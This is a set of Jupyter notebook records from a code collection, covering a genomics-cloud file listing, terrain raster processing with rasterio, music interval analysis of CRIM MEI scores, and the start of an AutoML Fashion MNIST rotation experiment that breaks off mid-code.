"_____no_output_____"
]
],
[
[
"## List (up to 50 of) my files\nA **list**-call for projects returns the following *attributes*:\n* **id** _Unique_ identifier for each file, generated by the CGC\n* **name** Name of file, maybe _non-unique_\n* **href** Address<sup>1</sup> of the file.\n\nSince we are not setting the **limit** parameter in api.files.query(), it _defaults_ to 50 records returned\n\n<sup>1</sup> This is the address where, by using API you can get this resource",
"_____no_output_____"
]
],
[
[
"# [USER INPUT] Set project name here, (pick one with files):\nproject_name = 'Gene Expression'\n\n\n# LIST all projects and check for name match\nmy_project = [p for p in api.projects.query(limit=100).all() \\\n if p.name == project_name] \n\nif not my_project: # exploit fact that empty list is False, {list, tuple, etc} is True\n print('The project named (%s) does not exist, please check spelling (especially trailing spaces)' \\\n % project_name)\n raise KeyboardInterrupt\nelse:\n # list the files in the target project\n my_files = api.files.query(my_project[0].id)\n\n# print up to the first 10 files\nfor ii in range(min(10,my_files.total)):\n print('file name is (%s); \\t file id is (%s)' % (my_files[ii].name, my_files[ii].id))",
"_____no_output_____"
]
],
[
[
"#### Note\nIf you had more than 50 files in your project you would hit pagination. For an example of how to deal with that see <a href=\"projects_listAll.ipynb\" target=\"_blank\">projects_listAll.ipynb</a>\n\n## Let's get all the files\nUsing the **.all()** method will take care of pagination for us",
"_____no_output_____"
]
],
[
[
"# print all files\nfor f in my_files.all():\n print('file name is (%s); \\t file id is (%s)' % (f.name, f.id))",
"_____no_output_____"
]
],
[
[
"## Additional Information\nDetailed documentation of this particular REST architectural style request is available [here](http://docs.cancergenomicscloud.org/docs/list-files-in-a-project)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e70680564596fac43467e5ad54a8939ef39aa02c | 461,604 | ipynb | Jupyter Notebook | Code/[3]New tif creation.ipynb | SalimFares4/Image-Segmentation | 787530a2db9ebd5881eaf042317411ce432fcc71 | [
"MIT"
] | null | null | null | Code/[3]New tif creation.ipynb | SalimFares4/Image-Segmentation | 787530a2db9ebd5881eaf042317411ce432fcc71 | [
"MIT"
] | 3 | 2021-12-16T10:09:36.000Z | 2022-02-11T17:53:31.000Z | Code/[3]New tif creation.ipynb | SalimFares4/Image-Segmentation | 787530a2db9ebd5881eaf042317411ce432fcc71 | [
"MIT"
] | null | null | null | 461,604 | 461,604 | 0.956944 | [
[
[
"!pip install rasterio",
"Collecting rasterio\n Downloading rasterio-1.2.10-cp37-cp37m-manylinux1_x86_64.whl (19.3 MB)\n\u001b[K |████████████████████████████████| 19.3 MB 5.9 MB/s \n\u001b[?25hRequirement already satisfied: click>=4.0 in /usr/local/lib/python3.7/dist-packages (from rasterio) (7.1.2)\nRequirement already satisfied: attrs in /usr/local/lib/python3.7/dist-packages (from rasterio) (21.4.0)\nCollecting affine\n Downloading affine-2.3.0-py2.py3-none-any.whl (15 kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.7/dist-packages (from rasterio) (57.4.0)\nCollecting cligj>=0.5\n Downloading cligj-0.7.2-py3-none-any.whl (7.1 kB)\nRequirement already satisfied: numpy in /usr/local/lib/python3.7/dist-packages (from rasterio) (1.19.5)\nRequirement already satisfied: certifi in /usr/local/lib/python3.7/dist-packages (from rasterio) (2021.10.8)\nCollecting click-plugins\n Downloading click_plugins-1.1.1-py2.py3-none-any.whl (7.5 kB)\nCollecting snuggs>=1.4.1\n Downloading snuggs-1.4.7-py3-none-any.whl (5.4 kB)\nRequirement already satisfied: pyparsing>=2.1.6 in /usr/local/lib/python3.7/dist-packages (from snuggs>=1.4.1->rasterio) (3.0.7)\nInstalling collected packages: snuggs, cligj, click-plugins, affine, rasterio\nSuccessfully installed affine-2.3.0 click-plugins-1.1.1 cligj-0.7.2 rasterio-1.2.10 snuggs-1.4.7\n"
],
[
"from osgeo import gdal\nimport numpy as np\nimport rasterio\nimport rasterio.plot\nimport matplotlib\nfrom matplotlib import pyplot as plt",
"_____no_output_____"
],
[
"# Root Directory\nImage_Segmentation_Path = '/content/drive/My Drive/Image Segmentation/'\n\n# Inputs/Sources\nProcessed_DEMs_Path = Image_Segmentation_Path + \"Processed DEMs/\"\nhigh_dem_interpolated = Processed_DEMs_Path + \"high_dem_interpolated.tif\"\ntest_dem = Image_Segmentation_Path + 'Source DEMs/test_dem.tif'\n\n# Outputs/Destinations\nslope_path = Processed_DEMs_Path + \"slope.tif\"\naspect_path = Processed_DEMs_Path + \"aspect.tif\"\nhillshade_path = Processed_DEMs_Path + \"hillshade.tif\"\n\n# transformed_path = Processed_DEMs_Path + \"high_dem_transformed.tif\"\ntransformed_path = Processed_DEMs_Path + \"1.tif\"\nslope_transformed_path = Processed_DEMs_Path + \"slope_transformed.tif\"\naspect_transformed_path = Processed_DEMs_Path + \"aspect_transformed.tif\"\ntest_dem_transformed = Processed_DEMs_Path + 'test_dem_transformed.tif'\ntest_dem_slope = Processed_DEMs_Path + 'test_dem_slope.tif'\ntest_dem_hillshade = Processed_DEMs_Path + 'test_dem_hillshade.tif'\n# PNGs for the report \nPNG_Path = Image_Segmentation_Path + \"PNG/\"",
"_____no_output_____"
],
[
"from sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()",
"_____no_output_____"
],
[
"with rasterio.open(DEM) as dataset:\n profile =dataset.profile\n meta = dataset.meta\n array=dataset.read(1)\n no_data_value = meta[\"nodata\"]\n\nno_data_value",
"_____no_output_____"
],
[
"def transform_values(DEM, transformed_path):\n with rasterio.open(DEM) as dataset:\n profile =dataset.profile\n meta = dataset.meta\n array=dataset.read(1)\n no_data_value = meta[\"nodata\"]\n array[array == no_data_value] = np.nan\n transformed_array = np.interp(array, (np.nanmin(array),np.nanmax(array)), (0,255))\n # transformed_array = scaler.fit_transform(array)\n transformed_array[np.isnan(transformed_array)] = -1\n with rasterio.open(transformed_path, 'w', **profile) as dest: \n dest.write_band(1, transformed_array)\n return transformed_array",
"_____no_output_____"
],
[
"def calculate_slope(DEM, slope_path):\n gdal.DEMProcessing(slope_path, DEM, 'slope')\n transform_values(DEM=slope_path, transformed_path=slope_transformed_path)\n with rasterio.open(slope_transformed_path) as dataset:\n slope=dataset.read(1)\n return slope\n\ndef calculate_aspect(DEM, aspect_path):\n gdal.DEMProcessing(aspect_path, DEM, 'aspect')\n transform_values(DEM=aspect_path, transformed_path=aspect_transformed_path)\n with rasterio.open(aspect_transformed_path) as dataset:\n aspect=dataset.read(1)\n return aspect\n\ndef calculate_hillshade(DEM, hill_shade_path):\n gdal.DEMProcessing(hill_shade_path, DEM, 'hillshade')\n with rasterio.open(hill_shade_path) as dataset:\n hillshade=dataset.read(1)\n return hillshade",
"_____no_output_____"
],
[
"tmp = transform_values(DEM=high_dem_interpolated, transformed_path=transformed_path)\n",
"_____no_output_____"
],
[
"np.min(tmp)\nnp.nanmin(tmp)",
"_____no_output_____"
],
[
"fig, (ax_interpolated, ax_transformed) = plt.subplots(ncols=2, nrows=1, figsize=(14,7))\nwith rasterio.open(high_dem_interpolated) as dem: \n rasterio.plot.show(dem, ax=ax_interpolated, title='Interpolated DEM')\nwith rasterio.open(transformed_path) as dem: \n rasterio.plot.show(dem, ax=ax_transformed, title='Transformed DEM')\n# fig.savefig(PNG_Path+\"Transformed DEM.png\")",
"_____no_output_____"
],
[
"# test = transform_values(DEM=test_dem, transformed_path=test_dem_transformed)",
"_____no_output_____"
],
[
"aspect",
"_____no_output_____"
],
[
"slope=calculate_slope(DEM=transformed_path, slope_path=slope_path)\n# aspect=calculate_aspect(DEM=high_dem_interpolated, aspect_path=aspect_path)\nhillshade=calculate_hillshade(DEM=transformed_path, hill_shade_path=hillshade_path)",
"_____no_output_____"
],
[
"slope=calculate_slope(DEM=test_dem, slope_path=test_dem_slope)\nhillshade=calculate_hillshade(DEM=test_dem, hill_shade_path=test_dem_hillshade)",
"_____no_output_____"
],
[
"print(np.min(slope))",
"0.0\n"
],
[
"fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(10, 10))\ndem = rasterio.open(high_dem_interpolated)\nrasterio.plot.show(dem, title='Interpolated DEM')\nfig.savefig(PNG_Path+\"Interpolated DEM.png\")",
"_____no_output_____"
],
[
"arr =dem.read(1)\npure = arr[arr != dem.meta['nodata']]",
"_____no_output_____"
],
[
"len(pure)",
"_____no_output_____"
],
[
"np.min(pure)",
"_____no_output_____"
],
[
"with rasterio.open(aspect_path) as aspect:\n rasterio.plot.show(aspect)\n# fig.savefig(PNG_Path+\"Aspect.png\")",
"_____no_output_____"
],
[
"with rasterio.open(slope_path) as slope:\n rasterio.plot.show(slope)\n# fig.savefig(PNG_Path+\"Slope\")",
"_____no_output_____"
],
[
"with rasterio.open(hillshade_path) as hill:\n rasterio.plot.show(hill)\n# fig.savefig(PNG_Path+\"Hillshade.png\")\n",
"_____no_output_____"
],
[
"# !pip install richdem\nimport richdem as rd",
"_____no_output_____"
],
[
"tmp2 = rasterio.open(high_dem_interpolated)",
"_____no_output_____"
],
[
"t = tmp2.read(1)",
"_____no_output_____"
],
[
"np.max(t)",
"_____no_output_____"
],
[
"np.min(t)",
"_____no_output_____"
],
[
"tt = np.interp(t, (np.nanmin(t),np.nanmax(t)), (0,255))",
"_____no_output_____"
],
[
"dem_rda = rd.rdarray(tt, no_data=0)\nrd.rdShow(dem_rda, axes=False, cmap='viridis')",
"_____no_output_____"
],
[
"np.max(tt)",
"_____no_output_____"
],
[
"np.min(tt)",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7068819bc6e791ecd249f6c3b0c2dc1b0ddf06d | 68,344 | ipynb | Jupyter Notebook | .ipynb_checkpoints/CRIM_Intervals_Morgan-Copy1-checkpoint.ipynb | RichardFreedman/CRIM-notebooks | e2aa0b0798615898644df9fe0cc92fe532a4bbdc | [
"MIT"
] | null | null | null | .ipynb_checkpoints/CRIM_Intervals_Morgan-Copy1-checkpoint.ipynb | RichardFreedman/CRIM-notebooks | e2aa0b0798615898644df9fe0cc92fe532a4bbdc | [
"MIT"
] | null | null | null | .ipynb_checkpoints/CRIM_Intervals_Morgan-Copy1-checkpoint.ipynb | RichardFreedman/CRIM-notebooks | e2aa0b0798615898644df9fe0cc92fe532a4bbdc | [
"MIT"
] | null | null | null | 33.436399 | 318 | 0.360544 | [
[
[
"## Start CRIM Intervals",
"_____no_output_____"
]
],
[
[
"from intervals.main_objs import *\nimport re\nimport pandas as pd",
"_____no_output_____"
]
],
[
[
"## Load MEI Files from CRIM or Github by pasting one or more of [these links](https://docs.google.com/spreadsheets/d/1TzRqnzgcYYuQqZR78c5nizIsBWp4pnblm2wbU03uuSQ/[email protected]#gid=0) below.\n\n*Note: each file must be in quotation marks and separated by commas\n",
"_____no_output_____"
]
],
[
[
"titles = ['https://crimproject.org/mei/CRIM_Model_0001.mei', \n'https://crimproject.org/mei/CRIM_Model_0002.mei', \n'https://crimproject.org/mei/CRIM_Model_0008.mei']\n\n'https://crimproject.org/mei/CRIM_Model_0009.mei', \n'https://crimproject.org/mei/CRIM_Model_0010.mei', \n'https://crimproject.org/mei/CRIM_Model_0011.mei', \n'https://crimproject.org/mei/CRIM_Model_0012.mei', \n'https://crimproject.org/mei/CRIM_Model_0013.mei', \n'https://crimproject.org/mei/CRIM_Model_0014.mei', \n'https://crimproject.org/mei/CRIM_Model_0015.mei', \n'https://crimproject.org/mei/CRIM_Model_0016.mei', \n'https://crimproject.org/mei/CRIM_Model_0017.mei', \n'https://crimproject.org/mei/CRIM_Model_0019.mei', \n'https://crimproject.org/mei/CRIM_Model_0020.mei', \n'https://crimproject.org/mei/CRIM_Model_0021.mei',\n'https://crimproject.org/mei/CRIM_Mass_0001_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_5.mei'",
"_____no_output_____"
],
[
"titles\n",
"_____no_output_____"
],
[
"for title in titles:\n short_title = clean_title = re.search(\"([^\\/]+$)\", title).group()\n corpus = CorpusBase([title])\n piece = corpus.scores[0]\n a= piece.getMelodic()\n a.to_csv(f\"{short_title}.csv\")\n",
"Memoized piece detected...\nMemoized piece detected...\nMemoized piece detected...\n"
],
[
"titles2 = ['https://crimproject.org/mei/CRIM_Model_0001.mei', \n'https://crimproject.org/mei/CRIM_Model_0002.mei']\ncorpus = CorpusBase(titles2)\n",
"Memoized piece detected...\nMemoized piece detected...\n"
],
[
"p1, p2 = corpus.scores\np1.getMelodic()",
"_____no_output_____"
]
],
[
[
"## Give the scores short names, in order according to the way they were listed above\n",
"_____no_output_____"
]
],
[
[
"# mass, model = corpus.scores\nprint(corpus)\n",
"<module 'music21.corpus' from '/Users/rfreedma/opt/anaconda3/lib/python3.8/site-packages/music21/corpus/__init__.py'>\n"
]
],
[
[
"## Now apply various methods to the scores:\n* **getNoteRest** returns all the notes and rests, each voice as a column\n* **getDuration** returns the durations for all notes and rests, as above\n* **getMelodic** returns the melodic intervals in each voice as a column\n* **getHarmonic** returns pairs of harmonic intervals between each pair of voices\n* **getNgrams** returns segments of various kinds, melodic (one voice) or modular (pairs of voices, including vertical and horizontal motion)\n---\n\n### Pandas Tools:\n* **df.value_counts()** returns summary for each pitch, duration for any type\n* save results as variable, then:**`.apply(pd.Series.value_counts).fillna(0).astype(int) `**\n---\n\n### Documentation available via this command:\n* for any method, use the following read documentation:\n`print(model.getNgrams.__doc__)`\n\n---\n",
"_____no_output_____"
]
],
[
[
"model.getMelodic()",
"_____no_output_____"
]
],
[
[
"# Notes and Rests\n",
"_____no_output_____"
]
],
[
[
"notes = model.getNoteRest()\nnotes.fillna(value= \"-\", inplace=True)\nnotes.reset_index()",
"_____no_output_____"
],
[
"notes.value_counts()\n# notes.stack().value_counts()",
"_____no_output_____"
],
[
"df = notes.apply(pd.Series.value_counts).fillna(0).astype(int)\n",
"_____no_output_____"
]
],
[
[
"# Melodic Intervals\n* kind='d' for diatonic; 's' for chromatic/semitone\n* To save as CSV: \n`mel_int.to_csv('file_name.csv')`\n",
"_____no_output_____"
]
],
[
[
"mel_int = model.getMelodic(kind='d')\nmel_int.fillna(value= \"-\", inplace=True)\nmel_int.reset_index()\n\n",
"_____no_output_____"
]
],
[
[
"# Durations\n",
"_____no_output_____"
]
],
[
[
"durs = model.getDuration()\ndurs.fillna(value= \"-\", inplace=True)",
"_____no_output_____"
]
],
[
[
"## Combine Notes and Durations as One DataFrame",
"_____no_output_____"
]
],
[
[
"notes_durs = pd.concat([notes, durs], axis=1)\nnotes_durs\n",
"_____no_output_____"
]
],
[
[
"# Select Columns for One Voice\n",
"_____no_output_____"
]
],
[
[
"notes_durs_s = notes_durs.iloc[:, [0,4]]\nnotes_durs_s",
"_____no_output_____"
]
],
[
[
"## N-Grams in Each Voice\n* for Melodic or Durations",
"_____no_output_____"
]
],
[
[
"mel = model.getMelodic()\nngrams = model.getNgrams(df=mel, n=4)\nngrams.reset_index()\n# mel2 = mel.iloc[:, [0]]\n# ngrams = model.getNgrams(df=mel2, n=5)\n# out = ngrams.value_counts()\n# out\n",
"_____no_output_____"
]
],
[
[
"# Harmonic Intervals between Voices",
"_____no_output_____"
]
],
[
[
"harm = model.getHarmonic()",
"_____no_output_____"
]
],
[
[
"# Two-Voice Modules as N-Grams\n",
"_____no_output_____"
]
],
[
[
"regMel = mass.getMelodic(unit=2, kind='d')\nregMel\nhar = mass.getHarmonic(kind='d')\nregHar = mass.regularize(har, 2)\nregHar\nng = mass.getNgrams(df=regHar, how='modules', other=regMel, cell_type=str)\nng",
"_____no_output_____"
]
],
[
[
"# NGrams with Regularized Durations",
"_____no_output_____"
]
],
[
[
"\n\nfiltered = ng[ng.apply(lambda row: row.astype(str).str.contains('7_1, 6_-2, 8').any(), axis=1)].copy()\nfiltered.reset_index(inplace=True)\nfiltered[\"measure\"] = filtered['index']/8+1\nfiltered\n\n",
"_____no_output_____"
]
],
[
[
"## Ngrams with Real Durations",
"_____no_output_____"
]
],
[
[
"modules2 = mass.getNgrams(how='modules', cell_type=str)\nmodules2\nfiltered2 = modules2[modules2.apply(lambda row: row.astype(str).str.contains('7_Held, 6_-2, 8').any(),axis=1)].copy()\nfiltered2.reset_index(inplace=True)\nfiltered2[\"measure\"] = filtered['index']/8+1\n\nfiltered2\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7068844abf7af9cb08ad9f3a9b199fbb6a94a24 | 20,767 | ipynb | Jupyter Notebook | docs/case_studies/test14.ipynb | thalvari/dpEmu-AutoML | b24eac686fae4147264c1ccc8169fd96b1875577 | [
"MIT"
] | null | null | null | docs/case_studies/test14.ipynb | thalvari/dpEmu-AutoML | b24eac686fae4147264c1ccc8169fd96b1875577 | [
"MIT"
] | 6 | 2019-11-19T05:44:24.000Z | 2019-12-18T21:10:04.000Z | docs/case_studies/test14.ipynb | thalvari/dpEmu-AutoML | b24eac686fae4147264c1ccc8169fd96b1875577 | [
"MIT"
] | null | null | null | 28.025641 | 127 | 0.520634 | [
[
[
"# AutoML Image Classification: With Rotation (Fashion MNIST)",
"_____no_output_____"
]
],
[
[
"import warnings\nwarnings.simplefilter(action=\"ignore\", category=FutureWarning)",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"import random as rn\nfrom abc import ABC, abstractmethod\n\nimport autokeras as ak\nimport h2o\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom h2o.automl import H2OAutoML\nfrom keras.datasets import fashion_mnist\nfrom numpy.random import RandomState\nfrom sklearn.datasets import load_digits\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom tpot import TPOTClassifier\n\nfrom dpemu import runner\nfrom dpemu.filters.common import GaussianNoise, Clip\nfrom dpemu.filters.image import RotationPIL\nfrom dpemu.nodes import Array\nfrom dpemu.nodes.series import Series\nfrom dpemu.plotting_utils import visualize_scores, print_results_by_model\nfrom dpemu.utils import generate_tmpdir",
"Better speed can be achieved with apex installed from https://www.github.com/nvidia/apex.\n"
],
[
"def get_data():\n # random_state = RandomState(42)\n # x, y = load_digits(return_X_y=True)\n # y = y.astype(np.uint8)\n # return train_test_split(x, y, test_size=.25, random_state=random_state)\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n s = x_train.shape[1]\n x_train = x_train.reshape((len(x_train), s**2)).astype(np.float64)\n x_test = x_test.reshape((len(x_test), s**2)).astype(np.float64)\n return x_train, x_test, y_train, y_test",
"_____no_output_____"
],
[
"def get_err_root_node():\n # err_img_node = Array(reshape=(8, 8))\n err_img_node = Array(reshape=(28, 28))\n\n err_root_node = Series(err_img_node)\n err_img_node.addfilter(RotationPIL(\"max_angle\"))\n return err_root_node\n # err_root_node = Series(err_img_node)\n # err_img_node.addfilter(GaussianNoise(\"mean\", \"std\"))\n # err_img_node.addfilter(Clip(\"min_val\", \"max_val\"))\n # return err_root_node",
"_____no_output_____"
],
[
"def get_err_params_list(data):\n angle_steps = np.linspace(0, 180, num=1)\n err_params_list = [{\"max_angle\": a} for a in angle_steps]\n return err_params_list\n # min_val = np.amin(data)\n # max_val = np.amax(data)\n # std_steps = np.round(np.linspace(0, max_val, num=6), 3)\n # err_params_list = [{\"mean\": 0, \"std\": std, \"min_val\": min_val, \"max_val\": max_val} for std in std_steps]\n # return err_params_list",
"_____no_output_____"
],
[
"class Preprocessor:\n\n def run(self, train_data, test_data, params):\n return np.round(train_data).astype(np.uint8), np.round(test_data).astype(np.uint8), {}",
"_____no_output_____"
],
[
"class AbstractModel(ABC):\n\n def __init__(self):\n self.time_limit_mins = 60*3\n self.seed = 42\n self.random_state = RandomState(self.seed)\n np.random.seed(self.seed)\n\n @abstractmethod\n def get_fitted_model(self, train_data, train_labels, params):\n pass\n\n @abstractmethod\n def get_accuracy(self, data, labels, fitted_model, params):\n pass\n\n @abstractmethod\n def get_best_pipeline(self, fitted_model):\n pass\n\n def run(self, train_data, test_data, params):\n train_labels = params[\"train_labels\"]\n test_labels = params[\"test_labels\"]\n\n fitted_model = self.get_fitted_model(train_data, train_labels, params)\n\n results = {\n \"test_acc\": self.get_accuracy(test_data, test_labels, fitted_model, params),\n \"train_acc\": self.get_accuracy(train_data, train_labels, fitted_model, params),\n \"best_pipeline\": self.get_best_pipeline(fitted_model),\n }\n print(type(fitted_model))\n print(results[\"test_acc\"])\n return results\n\nclass TPOTClassifierModel(AbstractModel):\n\n def __init__(self):\n super().__init__()\n\n def get_fitted_model(self, train_data, train_labels, params):\n return TPOTClassifier(\n max_time_mins=self.time_limit_mins,\n max_eval_time_mins=self.time_limit_mins,\n n_jobs=-1,\n random_state=self.seed,\n verbosity=1,\n ).fit(train_data, train_labels)\n \n def get_accuracy(self, data, labels, fitted_model, params):\n return round(fitted_model.score(data, labels), 3)\n\n def get_best_pipeline(self, fitted_model):\n return [step[1] for step in fitted_model.fitted_pipeline_.steps]\n\nclass H2OAutoMLModel(AbstractModel):\n\n def __init__(self):\n super().__init__()\n h2o.init(name=f\"#{rn.SystemRandom().randint(1, 2**30)}\", nthreads=20)\n h2o.no_progress()\n\n def get_fitted_model(self, train_data, train_labels, params):\n train_data = h2o.H2OFrame(np.concatenate((train_data, train_labels.reshape(-1, 1)), axis=1))\n x = np.array(train_data.columns)[:-1].tolist()\n y = np.array(train_data.columns)[-1].tolist()\n train_data[y] = train_data[y].asfactor()\n aml = H2OAutoML(max_runtime_secs=60*self.time_limit_mins, seed=self.seed)\n aml.train(x=x, y=y, training_frame=train_data)\n return aml\n\n def get_accuracy(self, data, labels, fitted_model, params):\n data = h2o.H2OFrame(np.concatenate((data, labels.reshape(-1, 1)), axis=1))\n y = np.array(data.columns)[-1].tolist()\n data[y] = data[y].asfactor()\n pred = 